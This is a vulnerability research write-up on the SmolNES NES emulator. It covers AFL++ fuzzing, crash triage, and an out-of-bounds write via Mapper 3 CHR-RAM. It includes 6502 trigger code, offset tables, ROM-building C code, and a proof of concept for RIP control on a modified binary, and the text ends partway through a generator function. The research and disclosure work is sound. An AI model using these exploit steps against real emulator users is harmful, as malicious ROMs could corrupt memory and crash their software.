Vulnerability Research on SmolNES

Apr 3, 2026

Executive summary

The SmolNES emulator contains multiple memory safety vulnerabilities, including an Out-Of-Bounds Write via Mapper 3 (CHR-RAM) that leads to arbitrary memory corruption when loading a malicious ROM.

In practice, only availability is definitively impacted: a malicious ROM can trigger a reproducible crash. In SmolNES’s memory layout, the GOT and the heap are out of reach, and no exploitable function pointer exists within the range reachable by the overflow.

That said, it makes for an excellent case study, directly transferable to more critical targets with a favorable memory layout: section 9 demonstrates RIP control in a modified binary built to simulate that scenario.

Background and target selection
Setting up the fuzzing environment
First results: initial crashes
Lead 1: OOB Read in PRG-ROM (abandoned)
Source code analysis
Fuzzing iterations and optimizations
Discovering the real vulnerability
Memory mapping and exploitation attempt
PoC on modified binary: RIP control
Responsible Disclosure and CVE
Appendix: Required NES concepts
Resources

1. Background and target selection

Why SmolNES?

SmolNES GitHub page, 776 stars and 3 contributors

The source code is available on GitHub (binji/smolnes).

SmolNES is a NES (Nintendo Entertainment System) emulator written in roughly 700 lines of “golf” C in deobfuscated.c (intentionally compact code). A few characteristics make it an ideal target:

Trivially AFL-fuzzable interface: the program takes a single .nes ROM as its argument (./smolnes <rom.nes>). It’s enough to feed AFL++ with binary files, then pass the generated files directly into smolnes.
Small codebase: the developer explicitly prioritized compactness (the tagline is “NES emulator in <5000 bytes of C”), which almost certainly means bounds checking was skipped.
Hidden complexity: the NES is a complex machine (6502 CPU, PPU, Mapper system). It would be surprising if a project like this, with no security focus, had no bugs.
Few maintainers: the project has only 3 contributors, so it is unlikely that any vulnerability research has been done on it before.

The main attack surface identified right away is the iNES file header (the first 16 bytes of a ROM), which configures critical parameters such as memory bank sizes, mapper type, and graphics mode.

2. Setting up the fuzzing environment

Preparing the binary

The SmolNES source includes two versions:

smolnes.c: the official “golfed” version (unreadable)
deobfuscated.c: a readable version with explanatory comments; this is the one I used for research

Two modifications are made to deobfuscated.c before compiling for fuzzing:

Removing SDL calls (Simple DirectMedia Layer, the graphics/audio library): SDL initialization, window creation, rendering, and event polling are commented out. Without this, the program would try to open a window on every execution, making fuzzing too slow to be viable.
Capping the CPU cycle count: a limit is added to the main loop. Without this, a valid ROM would run the emulator forever.
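The cycle cap can be as simple as a counter checked on every loop iteration. The sketch below is not the actual harness: MAX_STEPS, emu_step_fn, run_capped and spin_forever are hypothetical names, and the callback only stands in for one iteration of SmolNES's main loop.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical budget: large enough to reach game code, small enough to keep
 * each fuzzing execution short. The value used in the real harness is not
 * given in this write-up. */
#define MAX_STEPS 1000000u

/* Stand-in for one iteration of the emulator's main loop.
 * Returns 0 to keep running, non-zero to stop early. */
typedef int (*emu_step_fn)(void *state);

/* Runs the loop until the callback asks to stop or the budget is exhausted.
 * Returns the number of iterations executed. */
uint32_t run_capped(emu_step_fn step, void *state, uint32_t max_steps) {
  uint32_t steps = 0;
  while (steps < max_steps) {
    steps++;
    if (step(state) != 0) break;
  }
  return steps;
}

/* Example callback: a "ROM" that never terminates on its own. */
int spin_forever(void *state) {
  (void)state;
  return 0;
}
```

Calling run_capped(spin_forever, NULL, MAX_STEPS) returns once the budget is spent, which is the property AFL++ needs: every input terminates in bounded time.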

Compiling with AFL++

The instrumented binary is compiled using the environment variables from the provided Makefile:

CC=afl-clang-lto make

afl-clang-lto (Link-Time Optimization) is AFL++'s highest-performance compiler mode: it inserts instrumentation at link time, which gives collision-free edge coverage and typically better throughput than afl-clang-fast.

Seed corpus

Free-to-use NES ROMs from the EmuDeck homebrew repository are used as the initial corpus. AFL++ will mutate them automatically to explore new execution paths.

Initial run

afl-fuzz -i games/ -o output_dir/ -- ./smolnes_instru/deobfuscated @@

AFL++ TUI iteration 1: exec speed ~1500/sec, stability 100%, first crashes

The metrics are promising:

~1500 execs/sec: removing SDL was a success
stability 100%: the emulator is deterministic, which is essential for effective fuzzing

3. First results: initial crashes

AFL++ finds its first crashes quickly. Within minutes, 3 unique crash files are saved in output_dir/default/crashes/. After this initial burst, no new unique crashes appear, even after tens of minutes of additional fuzzing.

sig:11 (SIGSEGV) is present on all crashes, indicating an invalid memory access.

4. Lead 1: OOB Read in PRG-ROM (abandoned)

The first crash is loaded into GDB for analysis.

GDB crash OOB Read: fatal instruction movzx, $rax=0x3ffffc

→ movzx  r15d, BYTE PTR [rax+rcx*1+0x10]
; deobfuscated.c:234 : return rom[(prg[hi - 8 >> prgbits - 12] & ...) << prgbits | ...]
; mem(lo=0xfc, hi=0xf, val=0x0, write=0x0), reason: SIGSEGV

This corresponds to the following code:

// deobfuscated.c
return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
               << prgbits |
           addr & (1 << prgbits) - 1];

The emulator attempts to read at index 4,194,300 in rom[], a buffer with a maximum size of 1 MB: this is an Out-Of-Bounds Read.

Root cause: rombuf[4] (5th byte of the iNES header, number of PRG banks) was set to 0x00 by AFL. The emulator then initializes:

prg[1] = rombuf[4] - 1;
// If rombuf[4] == 0 : 0 - 1 = 255 (unsigned underflow)

The PRG-ROM read computation becomes prg[1] * 0x4000 + offset = 255 * 0x4000 + 0x3FFC = 0x3FFFFC, which is exactly the $rax value observed.
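The arithmetic can be checked in isolation. The sketch below re-implements the index expression outside the emulator; it assumes prgbits == 14 (16 KB banks, matching the 0x4000 multiplier above) and prg[0] == 0 at startup, and prg_rom_index is a name introduced here for illustration.

```c
#include <stdint.h>

/* Assumption: 16 KB PRG banks, i.e. prgbits == 14. */
enum { PRGBITS = 14 };

/* Recomputes the rom[] index for a CPU read at `addr` ($8000-$FFFF), given
 * header byte 4 and the startup bank setup prg[1] = rombuf[4] - 1. */
uint32_t prg_rom_index(uint8_t header_prg_banks, uint16_t addr) {
  uint8_t prg[2];
  prg[0] = 0;                                /* assumed initial value */
  prg[1] = (uint8_t)(header_prg_banks - 1);  /* 0 - 1 wraps to 255 */

  uint8_t hi = (uint8_t)(addr >> 12);        /* 8..15 for the ROM region */
  /* With header_prg_banks == 0 the mask becomes 0xFFFFFFFF: no clamping. */
  uint32_t bank_mask = ((uint32_t)header_prg_banks << (14 - PRGBITS)) - 1u;
  uint32_t bank = prg[(hi - 8) >> (PRGBITS - 12)] & bank_mask;
  return (bank << PRGBITS) | (addr & ((1u << PRGBITS) - 1u));
}
```

With a header byte of 0 and the Reset Vector address $FFFC, the function returns 0x3FFFFC; with a header byte of 1 it returns 0x3FFC, which is inside the single 16 KB bank.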

Why this lead is abandoned: this crash happens at the very start of execution, during the Reset Vector read (the game’s first instruction). It causes an immediate crash (DoS), but there is no control over the value read or the target address. Additionally, this bug blocks AFL: nearly every mutation generates this same immediate crash, the emulator never actually starts, and AFL cannot explore the deeper execution paths that are of interest.

5. Source code analysis

Before optimizing the fuzzer, it’s necessary to understand the code in order to target the right execution paths. This is a good moment to read the appendix covering the NES architectural concepts, as things get fairly dense from here.

Overview of deobfuscated.c

The code is built around a single large main function that contains the emulator’s main loop, plus a few helper functions.

Initialization: header parsing

// deobfuscated.c
SDL_RWread(SDL_RWFromFile(argv[1], "rb"), rombuf, 1024 * 1024, 1);
// The full ROM file is loaded into rombuf[1024*1024]

rom = rombuf + 16;        // Game code starts after the 16-byte header
prg[1] = rombuf[4] - 1;  // Index of the last PRG bank (header byte 4)

// Header byte 5: number of CHR-ROM banks in the file
// If 0: the game has no CHR-ROM, it uses CHR-RAM (8 KB of RAM)

//                                             v--- CHR-RAM mode: chrrom = chrram[8192]
chrrom = rombuf[5] ? rom + (rombuf[4] << 14) : chrram;
//                   ^--- CHR-ROM mode: chrrom points into the file

chrrom is the base pointer for graphics data access. Its value (either pointing into the ROM file or into chrram) is the pivot of the vulnerability.

The `get_chr_byte()` function

// deobfuscated.c
uint8_t *get_chr_byte(uint16_t a) {
  return &chrrom[chr[a >> chrbits] << chrbits | a % (1 << chrbits)];
}

The parameter a is a 14-bit VRAM address (value between 0 and 16383), representing a position in the PPU’s graphics address space. The variable V plays this role during an access from $2007.

The formula is compact. With chrbits = 12, a >> chrbits discards the low 12 bits of a; for a 13-bit address, what remains is a single bit (bit 12), which selects the bank slot. In standard CHR-RAM mode, a is bounded to $0000-$1FFF (8192 values) before the call, so a >> 12 can only be 0 or 1, selecting one of the two 4 KB slots. It is the value stored in that slot, chr[a >> 12], that can exceed 1 (the heart of the vulnerability). The << chrbits shift rebuilds the bank base address, and the modulo recovers the offset within the bank:

// Equivalent readable version (with chrbits = 12, bank size = 4096 bytes):
uint8_t *get_chr_byte_readable(uint16_t a) {
  uint8_t  bank_index = chr[a >> 12];          // bits 12-15 of 'a' -> bank number
  uint32_t bank_base  = bank_index << 12;      // bank_index * 4096
  uint16_t offset     = a & 0xFFF;            // bits 0-11 of 'a' -> offset within bank
  return &chrrom[bank_base + offset];
}

chr[] is an array of graphics bank indices, updated by the Mappers. In CHR-RAM mode, chrrom == chrram and chrram is only 8192 bytes (2 banks of 4096). If bank_index >= 2, then bank_base >= 8192, and the returned pointer goes past the end of chrram.
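For comparison, this is roughly what a guard would look like. It is a sketch, not a patch proposed to the maintainer: chr_offset and chr_ram_access_ok are hypothetical helpers, and the bank table is reduced to the two 4 KB slots that apply when chrbits == 12.

```c
#include <stddef.h>
#include <stdint.h>

enum { CHRBITS = 12, CHRRAM_SIZE = 8192 };

/* Byte offset that get_chr_byte() adds to chrrom for PPU address `a`,
 * given the current bank table. Only a < 0x2000 is meaningful here. */
size_t chr_offset(const uint8_t chr[2], uint16_t a) {
  size_t bank_base = (size_t)chr[(a >> CHRBITS) & 1] << CHRBITS;
  return bank_base | (a & ((1u << CHRBITS) - 1u));
}

/* Hypothetical guard: returns 1 when the access stays inside an 8 KB CHR-RAM
 * buffer, 0 when it would land past the end. */
int chr_ram_access_ok(const uint8_t chr[2], uint16_t a) {
  return chr_offset(chr, a) < CHRRAM_SIZE;
}
```

With chr = {0, 1}, every address up to $1FFF passes the check; with chr = {2, 3}, address $0000 already maps to offset 8192 and is rejected.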

The central `mem()` function

mem() emulates all 6502 CPU memory accesses. It takes the address (hi:lo), the value to write (val), and the operation direction (write).

// deobfuscated.c (excerpt)
uint8_t mem(uint8_t lo, uint8_t hi, uint8_t val, uint8_t write) {
  uint16_t addr = hi << 8 | lo;

  switch (hi >>= 4) {  // Divide hi by 16 to get the memory "region"

  case 0: case 1: // Region $0000-$1FFF: internal RAM (2 KB, mirrored over 8 KB)
    // The NES physically has only 2 KB of RAM ($0000-$07FF). The remaining 6 KB
    // ($0800-$1FFF) are mirrors: accessing $0800 or $0000 reads the same physical byte.
    return write ? ram[addr] = val : ram[addr];

  case 2: case 3: // Region $2000-$3FFF: PPU registers (mirrored)
    // The 8 PPU registers ($2000-$2007) are mirrored across the entire $2000-$3FFF range.
    // lo &= 7 keeps only the 3 low bits, mapping any address in this range to its
    // corresponding PPU register.
    // Ex: $2015 -> 0x15 & 7 = 5 -> register $2005 (ppuscroll).
    lo &= 7;

    if (lo == 7) { // Register $2007 = PPUDATA (PPU data port)
      // The PPU has a one-cycle read delay: reading $2007 does not immediately return
      // the value at address V, but the value from the previous cycle, stored in ppubuf.
      // The current read is buffered for the next access.
      // Exception: the palette ($3F00+) is returned without buffering.
      // That's why tmp = ppubuf at the start and return tmp at the end.
      tmp = ppubuf;
      uint8_t *rom =
          // If V points into the Pattern Table area (0x0000-0x1FFF):
          V < 8192  ? write && chrrom != chrram
                          ? &tmp              // Write to CHR-ROM: ignore
                                              // (tmp serves as a bit bucket; CHR-ROM
                                              // is read-only on real hardware)
                          : get_chr_byte(V)   // Write to CHR-RAM or any read
          // If V points into the Nametable area (0x2000-0x3EFF):
          : V < 16128 ? get_nametable_byte(V)
          // Otherwise: Palette area (0x3F00+)
                      : palette_ram + (uint8_t)((V & 19) == 16 ? V ^ 16 : V);
      write ? *rom = val : (ppubuf = *rom); // Actual write or read
      V += ppuctrl & 4 ? 32 : 1;  // V auto-increments after each $2007 access
      V %= 16384;  // V stays within the PPU address space (14 bits = 2^14 = 16384)
      return tmp;
    }
    // ... handling of other PPU registers ($2000 ppuctrl, $2006 ppuaddr, etc.)

  case 4: // Region $4000-$4FFF: APU and I/O registers
    // $4016: joypad read (keyboard state in the emulator)
    for (tmp = 0, hi = 8; hi--;)
      tmp = tmp * 2 + key_state[...]; // key_state = pointer to keyboard state

  case 6: case 7: // Region $6000-$7FFF: PRG-RAM (optional cartridge RAM)
    // Two distinct memories, two distinct roles:
    // - Internal RAM ($0000-$1FFF): 2 KB soldered on the motherboard. Game variables,
    //   6502 stack. Present on every NES.
    // - PRG-RAM ($6000-$7FFF): optional 8 KB ON the cartridge. Absent from most games.
    //   When present, often battery-backed to save progress (Zelda, Metroid).
    addr &= 8191; // Keep the 13 low bits (0x1FFF) to address prgram[8192]
    return write ? prgram[addr] = val : prgram[addr];

  default: // Region $8000-$FFFF: ROM + Mapper handling
    // IMPORTANT: writes to the ROM region do not modify the ROM.
    // They are intercepted and interpreted as commands to the Mapper.
    if (write)
      switch (rombuf[6] >> 4) { // Mapper number
      case 7: // Mapper 7 (AxROM)
        // ...
      case 4: // Mapper 4 (MMC3)
        // ...
      case 3: // Mapper 3 (CNROM): CHR bank switching only
        chr[0] = val % 4 * 2; // Even bank (0, 2, 4, or 6)
        chr[1] = chr[0] + 1;  // Next odd bank (1, 3, 5, or 7)
        break;
      case 2: // Mapper 2 (UNROM)
        // ...
      case 1: // Mapper 1 (MMC1)
        // ...
      }
    return rom[(prg[hi - 8 >> prgbits - 12] & (rombuf[4] << 14 - prgbits) - 1)
                   << prgbits |
               addr & (1 << prgbits) - 1];
  }
  return ~0;
}

Key points identified for the vulnerability:

Register $2007 (PPUDATA): this is the PPU’s data port. Writing to $2007 from 6502 code triggers a VRAM write, whose destination is computed by get_chr_byte(V). V is the PPU’s internal address cursor, controlled by writes to $2006 (PPUADDR).
Mapper 3: any write anywhere in $8000-$FFFF modifies chr[0] without bounds checking. With val=0x01 (or any val such that val % 4 == 1), chr[0] = 0x01 % 4 * 2 = 2.
The partial safety check: write && chrrom != chrram ? &tmp : get_chr_byte(V). If chrrom == chrram (CHR-RAM mode), the write goes through get_chr_byte with no bounds check on the bank index. This is the only case where a write can go out of bounds.

6. Fuzzing iterations and optimizations

Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

The first harness version simply removes SDL graphics calls and adds a cycle limit. AFL++ quickly finds 3 unique crashes (all related to the OOB Read in PRG-ROM described in section 4), then stalls.

Reason for the stall: the emulator crashes too early. When rombuf[4]=0, the NES CPU never really starts: its very first read, the Reset Vector, already lands about 4 MB into the 1 MB ROM buffer. AFL cannot explore the deeper execution paths (like the 6502 code that writes to $2007).

Iteration 2: header patches + ASAN + 6502 dictionary

Knowing the code better, several additional modifications are made.

Header patches in the harness (applied after reading the file):

// Prevent PRG underflow and the immediate $FFFC crash
if (rombuf[4] == 0 || rombuf[4] > 64) rombuf[4] = 1;
// Force CHR-RAM mode: chrrom = chrram, which activates the path through get_chr_byte()
rombuf[5] = 0;
// Force Mapper 3 (CNROM), preserve the mirroring bit
rombuf[6] = (rombuf[6] & 0x01) | 0x30;

These three patches steer AFL toward the vulnerable path:

rombuf[4] clamped: prevents the immediate PRG crash
rombuf[5] = 0: ensures chrrom == chrram, a necessary condition for the OOB Write
rombuf[6] = 0x3X: forces Mapper 3, enabling CHR bank switching without bounds checking

Note on rombuf[4] > 64: the value is capped at 64 banks maximum. This limit exactly matches the rombuf buffer size (1 MB / 16 KB per bank = 64 banks). Beyond that, index calculations would exceed the allocated megabyte. This is not an official NES limit (real NES ROMs have at most 32 PRG banks); it is a safety bound derived from the buffer size.

Compiling with ASAN:

AFL_USE_ASAN=1 CC=afl-clang-lto make

Without ASAN, an OOB Write silently corrupts adjacent memory, with no immediate crash, as long as the overwritten region is mapped and writable. ASAN detects the out-of-bounds access at the very first overflowed byte, making the crash systematic.

The trade-off is a performance drop: ~300 execs/sec instead of ~1500. Further optimizations could improve this, but it wasn’t necessary given that enough crashes were found at this reduced speed.

AFL++ dictionary (nes6502.dict):

# iNES header
magic="NES\x1a"
mapper3="\x30"

# 6502 write opcodes
op_sta_abs="\x8D"
op_stx_abs="\x8E"

# NES register addresses
ppu_addr="\x06\x20"   # $2006: PPUADDR
ppu_data="\x07\x20"   # $2007: PPUDATA
mapper_reg="\x00\x80" # $8000: Mapper 3 register

#...
# The actual dictionary I used was considerably larger

Without the dictionary, AFL has to stumble upon the sequence 8D 07 20 (STA $2007) by chance among 16,777,216 possible 3-byte combinations. With the dictionary, it inserts it directly.

Surface bug hotfixes:

Two additional bugs were identified and hotfixed in the harness to let ASAN reach the target bug:

OOB Write in palette_ram: the index (uint8_t)(...) can be up to 255, but palette_ram is only 64 bytes. Hotfix: & 63 to clamp the index.
OOB Read in PRG-ROM: the computed index in the PRG formula can exceed 1 MB. Hotfix: add a bounds check before the return.

Both bugs are real (confirmed on legitimate, unmodified ROMs), but of lesser interest: the first is a write with a limited range (at most 192 bytes past the end of palette_ram), the second is a read with no control over the value returned.
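The palette hotfix is easy to reason about in isolation. The sketch below copies the index expression from mem() and applies the & 63 clamp to it; the function names are introduced here, and where exactly the mask sits in the real harness is an assumption.

```c
#include <stdint.h>

enum { PALETTE_RAM_SIZE = 64 };

/* Index expression as it appears in mem() for V >= 0x3F00. */
uint8_t palette_index_original(uint16_t v) {
  return (uint8_t)((v & 19) == 16 ? v ^ 16 : v);
}

/* Same expression with the harness hotfix applied: clamp to 0..63. */
uint8_t palette_index_hotfixed(uint16_t v) {
  return palette_index_original(v) & (PALETTE_RAM_SIZE - 1);
}
```

For V = $3FFF the original expression yields index 255, well past a 64-byte array; the clamped version yields 63.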

Result: AFL++ finds the CHR-RAM OOB Write crash very quickly.

AFL++ TUI iteration 2: CHR-RAM OOB Write crash found with ASAN + dictionary + header patches

7. Discovering the real vulnerability: OOB Write via Mapper 3 CHR-RAM

The ASAN crash

With the patched binary (ASAN + forced Mapper 3 + forced CHR-RAM), AFL++ produces a new type of crash. Replayed under GDB with ASAN, it reveals:

ASAN: global-buffer-overflow WRITE 0 bytes after chrram

==ERROR: AddressSanitizer: global-buffer-overflow
WRITE of size 1 at 0x55555628c9a0 thread T0
    #0 in mem deobfuscated.c:92
0x55555628c9a0 is located 0 bytes after global variable 'chrram' (size 8192)

Unlike the previous crashes (READ), this one is a WRITE. It lands exactly at chrram[8192], the first byte past the end of the array.

The stack trace (#0) points to line 92 of mem():

write ? *rom = val : (ppubuf = *rom);  // line 92

Here, rom is the pointer returned by get_chr_byte(V), whose value has gone past the bounds of chrram. ASAN interrupts execution at the exact moment of the write.

Root cause: `get_chr_byte()` without bounds checking

In CHR-RAM mode (chrrom == chrram, from rombuf[5] = 0) with Mapper 3 active (rombuf[6] >> 4 == 3), any CPU write to $8000-$FFFF modifies the CHR banks:

case 3: // mapper 3
    chr[0] = val % 4 * 2;
    chr[1] = chr[0] + 1;
    break;

val is entirely controlled by the ROM. The possible values of chr[0] and their consequences:

val written   chr[0]   base offset into chrram   out-of-bounds?   OOB range
val%4 = 0     0        0                         no               -
val%4 = 1     2        8192                      yes              +4095 B
val%4 = 2     4        16384                     yes              +12287 B
val%4 = 3     6        24576                     yes              +20479 B

There is no check that chr[0] stays within the physical bounds of chrram.

Trigger conditions

Three conditions, all satisfiable by a malicious ROM:

rombuf[5] == 0 (iNES header byte 5, controlled by the ROM): enables CHR-RAM mode
rombuf[6] >> 4 == 3 (high nibble of header byte 6, controlled by the ROM): enables Mapper 3
6502 code writes to $2007 (PPUDATA) with V in $0000-$1FFF, after a Mapper write that set chr[0] >= 2

Write address control

The target address is fully derivable from two controllable parameters:

address = &chrram[ chr[V >> 12] * 4096 + (V & 0xFFF) ]

val written to $8000+: determines chr[0] (0, 2, 4, or 6)
V: positioned by two consecutive writes to $2006

Granularity is one byte. The written value (from the 6502’s A, X, or Y register) is also controlled by the ROM.

Demonstration: minimal 6502 assembly

The following sequence triggers an OOB Write at the first byte after chrram. iNES header: 1 PRG bank (rombuf[4] = 1), 0 CHR banks (rombuf[5] = 0), Mapper 3 (rombuf[6] = 0x30).

; Entry point (Reset Vector at $FFFC points here)

; Step 1: select the CHR bank via Mapper 3
; val=1 => chr[0] = 1%4*2 = 2 => base offset = 2*4096 = 8192 (first OOB byte)
LDA #$01         ; $A9 $01
STA $8000        ; $8D $00 $80 -> Mapper 3: chr[0]=2, chr[1]=3

; Step 2: set V via two consecutive writes to $2006
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (high byte: $00)
LDA #$00         ; $A9 $00
STA $2006        ; $8D $06 $20  (low byte: $00) => V = $0000

; Step 3: write via $2007 (PPUDATA)
; get_chr_byte($0000) = &chrram[2*4096 + 0] = &chrram[8192] -> OOB
LDA #$41         ; $A9 $41  (value to write)
STA $2007        ; $8D $07 $20 -> WRITE to chrram[8192]
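The same sequence can be packed into a ROM image with a few lines of C. This is a sketch under assumptions, not the generator used for this research: it places the code at $8000, relies on a single 16 KB bank being visible at both $8000 and $C000 (prg[0] == 0 and prg[1] == 0), and appends a JMP loop that is not part of the listing above so the CPU does not run into zero bytes. build_poc_rom is a name introduced here, and the image has not been validated against SmolNES.

```c
#include <stdint.h>
#include <string.h>

enum { HEADER_SIZE = 16, PRG_BANK_SIZE = 16384,
       ROM_SIZE = HEADER_SIZE + PRG_BANK_SIZE };

/* Fills `rom` (ROM_SIZE bytes) with a minimal iNES image. */
void build_poc_rom(uint8_t rom[ROM_SIZE]) {
  static const uint8_t code[] = {
    0xA9, 0x01, 0x8D, 0x00, 0x80, /* LDA #$01 ; STA $8000 */
    0xA9, 0x00, 0x8D, 0x06, 0x20, /* LDA #$00 ; STA $2006 (high byte) */
    0xA9, 0x00, 0x8D, 0x06, 0x20, /* LDA #$00 ; STA $2006 (low byte) */
    0xA9, 0x41, 0x8D, 0x07, 0x20, /* LDA #$41 ; STA $2007 */
    0x4C, 0x14, 0x80              /* JMP $8014: spin (added for this sketch) */
  };
  memset(rom, 0, ROM_SIZE);
  memcpy(rom, "NES\x1a", 4);      /* iNES magic */
  rom[4] = 1;                     /* 1 PRG bank */
  rom[5] = 0;                     /* 0 CHR banks: CHR-RAM mode */
  rom[6] = 0x30;                  /* Mapper 3 */
  memcpy(rom + HEADER_SIZE, code, sizeof code);
  /* Reset Vector at $FFFC-$FFFD, little-endian, pointing to $8000. */
  rom[HEADER_SIZE + 0x3FFC] = 0x00;
  rom[HEADER_SIZE + 0x3FFD] = 0x80;
}
```

Writing the resulting 16,400-byte buffer to a .nes file gives an input that can be passed to the emulator in the same way as the fuzzer-generated files.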

To target a different offset:

target (offset from start of chrram)   val at $8000     V via $2006
8192 + N (N < 4096)                    $01 (chr[0]=2)   $0000-$0FFF
16384 + N (N < 4096)                   $02 (chr[0]=4)   $0000-$0FFF
24576 + N (N < 4096)                   $03 (chr[0]=6)   $0000-$0FFF
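The table can be inverted mechanically: given an offset from the start of chrram, recover the value to write to $8000 and the V to load through $2006. The sketch below does that; chr_write_plan and plan_chr_write are hypothetical names. It also covers the odd 4 KB banks, which the table does not list: they follow from chr[1] = chr[0] + 1 and are selected with V in $1000-$1FFF.

```c
#include <stdint.h>

/* Parameters a ROM needs in order to hit one byte. */
typedef struct {
  uint8_t  mapper_val;  /* value to store to $8000 (sets chr[0] and chr[1]) */
  uint16_t v;           /* PPU address to load through $2006 */
} chr_write_plan;

/* Splits an offset from &chrram[0] into (mapper value, V).
 * Even banks go through chr[0] (V in $0000-$0FFF), odd banks through
 * chr[1] (V in $1000-$1FFF). Returns 0 on success, -1 if out of reach. */
int plan_chr_write(uint32_t offset, chr_write_plan *out) {
  uint32_t bank = offset >> 12;   /* 4 KB bank index */
  if (bank > 7) return -1;        /* chr[1] tops out at 7 */
  out->mapper_val = (uint8_t)(bank / 2);
  out->v = (uint16_t)(((bank & 1u) << 12) | (offset & 0x0FFFu));
  return 0;
}
```

For offset 8192 this gives mapper value $01 and V = $0000, matching the first row of the table.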

8. Memory mapping and exploitation attempt

.bss section layout

GDB: addresses of global variables in the .bss section

The order of global variables in memory (.bss section, confirmed via GDB on the release binary):

0x55555567a220  chrram      [8192 bytes]  <- start of the overflow region
0x55555567c220  ram         [8192 bytes]
0x55555567e220  palette_ram [64 bytes]
0x55555567e260  vram        [2048 bytes]
0x55555567ea60  ptb_lo      [1 byte]
0x55555567ea70  addr_lo     [1 byte]
0x55555567ea80  prg         [4 bytes]
0x55555567ea90  rom         [8 bytes]  (pointer)
...

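Maximum overflow range with Mapper 3: with chr[0] max = 6, the furthest reachable byte is 6 * 4096 + 4095 = 28671 bytes from the start of chrram, i.e. ~20 KB out-of-bounds. (With V in $1000-$1FFF the lookup goes through chr[1] = 7 instead, which pushes the limit one 4 KB bank further, to offset 32767.)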

The GOT is out of reach

The natural first target for an OOB Write is the GOT (Global Offset Table), which holds the addresses of libc functions. Overwriting a GOT entry redirects a function call to arbitrary code.

GDB: GOT located before the .bss section, out of reach

gef➤  p/d 0x555555559fc0 - 0x55555567a220 # GOT - chrram
$5 = -1180256   # Negative value (~-1.1 MB)

The GOT is located approximately 1.1 MB before chrram in memory. Since the OOB Write can only reach addresses at positive offsets from chrram, the GOT is inaccessible.

The heap is out of reach

The heap (dynamically allocated by SDL at startup) is another potential target: it may contain function pointers or exploitable allocator metadata.

Distance chrram -> heap start: 0x23e749f0 ~ 574 MB

As expected, ASLR places the heap several hundred megabytes away from the .bss section. The maximum OOB range (~20 KB with Mapper 3) is nowhere near that distance.

Analysis of variables within range

In the ~20 KB reachable after chrram, the variables present are integer arrays (ram, palette_ram, vram) and scalars (ptb_lo, addr_lo, 6502 registers, prg). Overwriting them disrupts emulation but provides no useful primitive: no function pointer is present in this region.

One variable stands out, though: the pointer rom, located ~18 KB past the start of chrram. It points to the start of the PRG data inside rombuf and is used for offset calculations. Overwriting it would change the base for address arithmetic, potentially enabling access to arbitrary memory, but it would also alter where instructions are read from. This primitive self-destructs upon use.
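The reachability reasoning used in this section boils down to one range check. In the sketch below, oob_reachable is a hypothetical helper, and max_offset is the furthest offset from the start of chrram that the primitive can reach (28671 in the computation above).

```c
#include <stdint.h>

enum { CHRRAM_SIZE = 8192 };

/* Returns 1 if `target_addr` lies past the end of chrram but still within
 * `max_offset` bytes of its start, 0 otherwise. */
int oob_reachable(uint64_t chrram_addr, uint64_t target_addr,
                  uint32_t max_offset) {
  if (target_addr < chrram_addr) return 0;  /* negative offsets: never */
  uint64_t offset = target_addr - chrram_addr;
  return offset >= CHRRAM_SIZE && offset <= max_offset;
}
```

Fed with the addresses from the GDB session, it reports the GOT (0x555555559fc0) as unreachable and the rom pointer (0x55555567ea90, offset 18544) as reachable.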

Impact assessment

Guaranteed DoS: reproducible crash with a malicious .nes ROM, confirmed via ASAN
Memory corruption: up to ~20 KB of global variables can be overwritten, disrupting emulation arbitrarily
Direct RCE: not achievable with this memory layout (GOT and heap out of reach, no function pointer in the reachable region)

9. PoC on modified binary: RIP control

SmolNES’s memory layout contains no function pointer within the overflow’s reach. To illustrate the vulnerability’s potential in a favorable scenario, a function pointer is manually added to deobfuscated.c’s source, in the .bss section immediately after chrram. This pointer does not exist in the original binary. A malicious ROM overwrites it with 0xdeadbeef, giving control of RIP (the instruction pointer register on x86_64) on the next call.

Code modification

The modification touches four files: two edited (Makefile, deobfuscated.c) and two new (poc_hook.h, poc_hook.c). The function pointer is declared in a separate compilation unit (poc_hook.c) to ensure the linker places its .bss after that of deobfuscated.o, and therefore at a higher address than chrram.

poc_hook.h:

typedef void (*render_hook_t)(void);
extern render_hook_t render_hook;

poc_hook.c:

typedef void (*render_hook_t)(void);
render_hook_t render_hook;

Full diff:

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -18,8 +18,8 @@
-deobfuscated: deobfuscated.c
-       $(CC) -O2 -o $@ $< ${SDLFLAGS} -g ${WARN}
+deobfuscated: deobfuscated.c poc_hook.c
+       $(CC) -O2 -o $@ deobfuscated.c poc_hook.c ${SDLFLAGS} -g ${WARN}

diff --git a/deobfuscated.c b/deobfuscated.c
--- a/deobfuscated.c
+++ b/deobfuscated.c
@@ -1,5 +1,6 @@
 #include <SDL2/SDL.h>
 #include <stdint.h>
+#include "poc_hook.h"

@@ -691,6 +691,8 @@
         SDL_RenderPresent(renderer);
+        // [POC] Call render hook if defined
+        if (render_hook) render_hook();
         // Handle SDL events.

Two points to note:

Makefile: poc_hook.c is added as an explicit source. The linker places poc_hook.o’s .bss after deobfuscated.o’s, guaranteeing that render_hook ends up at an address higher than all variables in deobfuscated.c, including chrram.
Call site: the hook is called after each SDL_RenderPresent, i.e. once per frame (scanline 241). That’s the natural moment for an emulator to expose this kind of callback.

This pattern is realistic: many emulators expose such callbacks for debugging tools, save states, or GUI frontends.

Malicious ROM

The ROM is generated by the make_poc_rom.py script (see Resources). It takes the offset of render_hook relative to chrram in the target binary's .bss, then writes 0xdeadbeef as an 8-byte little-endian pointer through eight successive writes to $2007; V advances by 1 after each one (the PPUDATA auto-increment).
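The core of such a generator is a short routine that emits the 6502 bytes. The following is a C sketch of that idea, not a port of make_poc_rom.py: emit_store and emit_pointer_overwrite are names introduced here, and the code assumes ppuctrl bit 2 is clear (increment of 1), that the $2006 write toggle starts at 0, and that the 8 bytes stay within the $0000-$1FFF window.

```c
#include <stddef.h>
#include <stdint.h>

/* Appends "LDA #val ; STA addr" (5 bytes) at out[pos]; returns the new pos. */
static size_t emit_store(uint8_t *out, size_t pos, uint8_t val, uint16_t addr) {
  out[pos++] = 0xA9;                    /* LDA immediate */
  out[pos++] = val;
  out[pos++] = 0x8D;                    /* STA absolute */
  out[pos++] = (uint8_t)(addr & 0xFF);  /* address, little-endian */
  out[pos++] = (uint8_t)(addr >> 8);
  return pos;
}

/* Emits code that selects the CHR bank, loads V, then stores the 8
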